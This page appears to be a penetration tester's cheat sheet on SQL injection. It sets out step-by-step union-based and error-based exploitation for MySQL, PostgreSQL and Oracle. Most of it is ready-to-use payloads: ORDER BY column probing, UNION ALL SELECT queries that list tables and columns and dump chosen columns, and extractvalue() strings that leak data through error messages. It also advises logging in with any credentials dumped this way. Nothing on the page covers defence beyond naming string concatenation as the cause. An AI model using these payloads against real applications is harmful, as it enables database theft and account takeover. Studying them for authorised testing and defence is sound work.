SQLI

The leading cause of SQL injection is string concatenation.

This vulnerability can be exploited to dump the contents of an application database.

The two most common types of SQL injection are union-based and error-based.

Union-based SQL injection: uses the “UNION” SQL operator to combine the results of two or more “SELECT” statements into a single result.
Error-based SQL injection: utilizes the errors the SQL server throws to extract information.

MySql

Automation: using SqlMap.

Swap tabs

Once you know that an endpoint is vulnerable to SQL injection the next step is to exploit it:

Figure out how many columns the endpoint contains using the “order by” operator and keep adding one to the number until you get an error:

--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).

Figure out which columns are being displayed on the page using the “union all select” statement which can be accomplished by putting an invalid value:

--> Notice the numbers on the page refer to the columns displayed on the front end.

Display the database version using mysql commands:

--> @@version / version()

--> 💡Note the version down to help later

get a list of database tables:

union all select 1,2,group_concat(table_name) from information_schema.tables 
where table_schema = database()

Get the table's columns

union all select 1,2,group_concat(column_name) from information_schema.columns where table_name = "tbName"

Dump the contents of specific columns:

union all select 1,2,group_concat(col,":",col) from tbNa

In case retrieving username:password for a user, we can use them to log in as that user.

Useful when there is no output except a SQL error.

Xpath

If the MySql service version is 5.1 or later we can use the “ extractvalue() ” function to exfiltrate data from the database.

generates a SQL error when it is unable to parse the XML data passed to it.

ExtractValue() function

used to parse out a value from an XML document
The first argument is an XML document and the second argument is the tag we want to get the value of.
second argument starts with a “;” it will cause a MySql error message to appear along with the string that caused the error.

Abusing ExtractValue() function to extract data via error messages:

extract the MySql database version via an error message:

AND extractvalue("blahh",concat(";",@@version))

get a list of table names:


// Note: The “limit 0,1” command is used to get the first row in the table
// and to get the second table you would use “limit 1,1”
AND extractvalue("blahh",(select concat(";",table_name) from information_schema.tables where table_schema = database() limit 0,1))

Get a list of columns belonging to a specific table:

AND extractvalue("blahh",(select concat(";",column_name) from information_schema.columns where table_name = "tbName" limit 0,1))

dump the contents of specific columns:

AND extractvalue("blahh",(select concat(";",col,":",col) from tbName limit 0,1))

In case retrieving username:password for a user, we can use them to log in as that user.

PostgreSQL

In case an error message is displayed, if you see the “psycopg2” name you know you’re working with a Postgres database server.

Union Based

Figure out how many columns the endpoint contains using the “order by” operator and keep adding one to the number until you get an error:

--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).

Figure out which columns are being displayed on the page using the “union all select” statement which can be accomplished by putting an invalid value:

--> Notice the numbers on the page refer to the columns displayed on the front end.

If you weren't able to detect the database type from the error message you could always use the “version()” function to print the database type:

-->-1 union all select 1,version()

Get a list of all tables in the databases:

// Offset ‘0’ gets the first table name, offset ‘1’ gets the second, and so on.
// filter out the default databases “pg_catalog” and “information_schema” as they tend to clog up the results. 
union all select 1,table_name from information_schema.tables where table_schema != 'pg_catalog' and table_schema != 'information_schema' offset 0

Get a list of columns belonging to a specific table:

union all select 1,column_name from information_schema.columns where table_name = 'tbName' offset 0

Dump the contents of specific columns:

union all select 1,concat(col,':',col) from tbName offset 0

In case retrieving username:password for a user, we can use them to log in as that user.

Oracle

Requires some additional knowledge to successfully exploit it.

Similar to PostgreSQL when you are selecting a column it must match the type of the first select statement.
When using the select operator you must specify a default “dual” table.

Test

Throw a bunch of single and double quotes around until you get an error message starting with “ORA” which indicates dealing with an Oracle database.

Union Based

Figure out how many columns the endpoint contains using the “order by” operator and keep adding one to the number until you get an error:

--> Order by 1 --> Order by 2 --> Order by n --> error (indicates there must be n-1 columns).

Figure out which columns are being displayed on the page using the “union all select” statement which can be accomplished by putting an invalid value:

--> Notice the numbers on the page refer to the columns displayed on the front end.

Figure out the target table name:


//Oracle uses the “all_tables” e to get a list of tables.
// When using the listagg() function you must also use the ‘within group()’ operator to specify the order of the listagg function results.
union all select LISTAGG(table_name,',') within group (ORDER BY table_name),null from all_tables where tablespace_name = 'USERS' --

Get the table's columns:

union all select LISTAGG(column_name,',') within group (ORDER BY column_name),null from all_tab_columns where table_name = 'EMPLOYEES'--

Extract the sensitive information

Union all select email,phone_number from employees

PreviousOWASP NextXSS

Last updated 2 years ago